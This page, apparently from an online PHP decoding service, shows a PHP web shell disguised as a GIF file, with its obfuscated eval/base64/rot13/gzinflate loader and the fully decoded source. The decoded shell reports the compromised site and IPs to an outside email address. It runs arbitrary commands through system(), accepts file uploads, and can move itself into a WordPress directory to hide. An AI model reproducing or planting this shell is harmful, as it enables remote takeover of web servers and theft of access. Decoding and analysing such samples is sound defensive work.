Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

GIF89a???????????!??????,???????D?;?<?php $language = 'eng'; $auth = 0; $name =..

Decoded Output download

error_reporting(0);
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-simple.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>UnKnown - Simple Shell</title><br><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
if(function_exists('system')){
echo "<pre>";
echo "<textarea name=cmd cols=100% rows=10%>";
system($cmd);
echo "</textarea>";
echo "</pre>";
}
}

Did this file decode correctly?

Original Code

GIF89a???????????!??????,???????D?;?<?php
$language = 'eng';
$auth     = 0;
$name     = ''; // md5 Login
$pass     = ''; // md5 Password
/**************************************************************************************************************************************************************/
error_reporting(0);
$rhs = 'rUh6QuM4EP58VfwH4+sqqRZFOOkkDhq0HISluoVlWntfAFJh4rZeEjuyHbo9xH/fsZ30ctnlOHYrSFp0nnReHo8nR1chE1ZYITXjRn+/fby9xSbI325XRO23kjiK417/+tYbk8/kwbtit39s2t53PTLFZyoqrkSI9oHUmtMxPBrC4J91Y4svh8Ob5LIfD/G9ZDP+bMM9iP4eUvEwGQ1tDjAW2QIQmHEELQifImDQR6M7YU8bPjYwUia02M8oQD8wzpIpR+kZcEWIjG3L+pfANm13KZpJkukFhI9CL6Lkqn8eToD+xQU+ft7eormir6CuAXFGRkxFGU/GmUNtvOCkoP6yI8/9Jqfn5wOQqe6ZPnUhIciPVYPoqj+M1lUFbrmPx0+NqSLyj8MPRnAJRUTgXYStV2sXXxLFZfSnORLC0Vnr8qjTdmcCxZpJ7mvvBsVHPkVGUd3BHVRg7UxshQRmRie2SL848vqESk+9QLx/YhVvE78Zm4/R8NZYZsGpGRkzMVdHMqXrM+DFdIPezTC56H2KrkKvIs/OTlOVcyhcoc77dKOr6G2YDPr9oWof4M683HA8zSuAmnTFijKnTjkrzYRV6iRp+WmRC9hpDfzE8Tlt0/gcufEBQzoTCGo10zk9GfG/uJhmtIdvWzuKdDTPux3n7Y6l/Zphd9pRwFJG7F8a/oZFkcOp/W11PwA8wcEyaoC7nfGS3AJwRcGhh9jHAbSagAH00dbotwPcfniOERCgmYpyoY1HLOARIixGBBhaSs7pt871st6UzxwiJMTmS5PKHnZ7M8yk4qlzgqNlDsmQmbFnnrm7lhqTm8hJFSotcimUYvy7XsezA3ZdO8aXRmFd7b0D45BHSpIjcAkA3Jzw05rdQXt6/16Ku7v/kwPQP0FFJzKSbCCZLENuSQkofXBpKyJJgxDjk9cFPRNSTmvWCNhyvKw00ouShkvTLxojo2SI0yLDm964Ghd55WpkMG0kbHL/PwC+cCo78Y43K6VjQDZRROWalVF3i9vLiCZa5Vo7ppv/dW5H5oJx6ILl1LbRMegX3cxLlkReSqtc7RuACfB4t5la8xfXOQ9dtEqruKZmyz5P61KsxTd3OvbB72geQefmAaM0J1eFmnkQXJG1D4/1RVvX8Ia8eCvWKGnrOWWzcSvLyJjZ9uXqDuy0eR0Npy4HVULWbpey2cLxrddV4t0DzoLsHBbikSYuOs0SA/C/WNFSmTgaed5yNYFaRhfzRk+ZYd0edqYC3pI0M3vhGbmFjDb8ZJWmRymkwRR8Gw6W19E5wsfo2d62FyLXUN+oDGrEV0k7i8y+uYDVrKSEfm5XK2uzLJSmhbdJYbeUZ30LmnYhkhI3KSYyWZwKD/b33yEp5ubpncW7Q75W3l7ROw1/PXOnyW7a+Qo=';
eval(gzinflate(str_rot13(base64_decode($rhs))));
?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1
error_reporting 1

Variables

$rhs rUh6QuM4EP58VfwH4+sqqRZFOOkkDhq0HISluoVlWntfAFJh4rZeEjuyHbo9..
$auth 0
$name
$pass
$language eng

Stats

MD5 c3b01e92f7f0b3172b32609ed4e2bcd9
Eval Count 1
Decode Time 80 ms